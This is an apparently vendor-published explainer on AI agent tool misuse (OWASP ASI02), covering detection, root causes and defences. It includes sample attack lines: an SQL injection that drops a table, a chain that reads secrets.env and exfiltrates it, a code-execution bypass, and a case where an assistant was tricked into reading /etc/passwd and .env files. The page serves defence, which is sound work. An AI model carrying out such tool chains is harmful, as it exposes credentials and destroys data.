Criticalprotocol

Tool Misuse

Agents use their tools in unintended, harmful, or dangerous ways, either through manipulation or emergent behavior.

Overview

How to Detect

Tools invoked with unexpected parameters. Excessive or unusual tool usage patterns. Tools used to access resources outside task scope. Chained tool calls that circumvent restrictions.

Root Causes

Overly permissive tool access. Missing parameter validation. No tool call auditing. Agents given tools beyond task requirements. Inadequate tool documentation for agents.

Need help preventing this failure?
Talk to Us

Deep Dive

Overview

Tool misuse (OWASP ASI02) occurs when agents invoke tools in ways that were not intended by system designers. This can result from direct attacks, emergent behavior, or subtle manipulation that exploits the gap between tool capabilities and agent understanding.

Categories of Tool Misuse

Direct Misuse

Agent uses tools for purposes they weren't designed for:

# Intended: Send notification emails
# Misuse: Mass spam campaign
email_tool.send(
    to=all_users,  # Not just relevant user
    subject="URGENT: Click this link",
    body=malicious_content
)

Parameter Injection

Manipulating tool parameters to achieve unintended effects:

# Intended: Query specific record
database.query("SELECT * FROM users WHERE id = ?", user_id)

# Manipulated: Dump entire table
database.query("SELECT * FROM users; DROP TABLE users; --")

Chained Tool Attacks

Combining legitimate tool calls to achieve illegitimate goals:

1. list_files("*") → Discover sensitive files
2. read_file("secrets.env") → Extract credentials
3. http_request(external_server, data=secrets) → Exfiltrate

Emergent Misuse

Agent discovers unintended tool capabilities through exploration:

Agent realizes file_write() + code_execute() can be combined
to create and run arbitrary code, bypassing code restrictions.

Tool Categories at Risk

High-Risk Tools

  • Code Execution: Can run arbitrary code
  • Network Access: Can exfiltrate data or attack external systems
  • Database Access: Can read, modify, or delete data
  • File System: Can access or modify sensitive files
  • Messaging: Can communicate externally

Medium-Risk Tools

  • Search/Query: Can access sensitive information
  • User Management: Can escalate privileges
  • Configuration: Can modify system behavior

Defense Strategies

Tool Allowlisting

ALLOWED_TOOLS = {
    "search": SearchTool(max_results=10),
    "calculate": CalculatorTool(),
    # No file system or network tools
}

Parameter Validation

def validate_email_params(to, subject, body):
    if len(to) > 1:
        raise ToolMisuseError("Bulk email not permitted")
    if any(word in body.lower() for word in SPAM_INDICATORS):
        raise ToolMisuseError("Potentially harmful content")

Tool Call Auditing

@audit_tool_call
def execute_query(query):
    log_tool_usage("database", query)
    if is_destructive_query(query):
        require_human_approval()
    return database.execute(query)

How to Prevent

Principle of Least Privilege: Only provide tools strictly necessary for the task.

Strict Parameter Validation: Validate all tool parameters against expected ranges and patterns.

Tool Call Rate Limiting: Limit frequency and volume of sensitive tool calls.

Human-in-the-Loop: Require approval for high-risk tool operations.

Tool Call Auditing: Log and monitor all tool invocations for anomalies.

Sandboxed Execution: Run tool calls in isolated environments when possible.

Tool Capability Documentation: Clearly document intended uses to guide agent behavior.

Validate your mitigations work
Test in Playground

Real-World Examples

An AI coding assistant with file system access was manipulated into reading /etc/passwd and .env files through a "debugging help" request, exposing system credentials and API keys to the attacker.

PreviousSupply Chain Compromise
NextZero-Click Data Exfiltration
Tags
owasptoolsmisusesecuritypermissions

Was this failure mode helpful?

Report a new failure mode